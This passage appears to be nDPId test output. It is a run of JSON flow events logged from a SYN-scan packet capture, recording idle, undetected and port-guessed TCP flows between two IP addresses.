-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","ndpi": 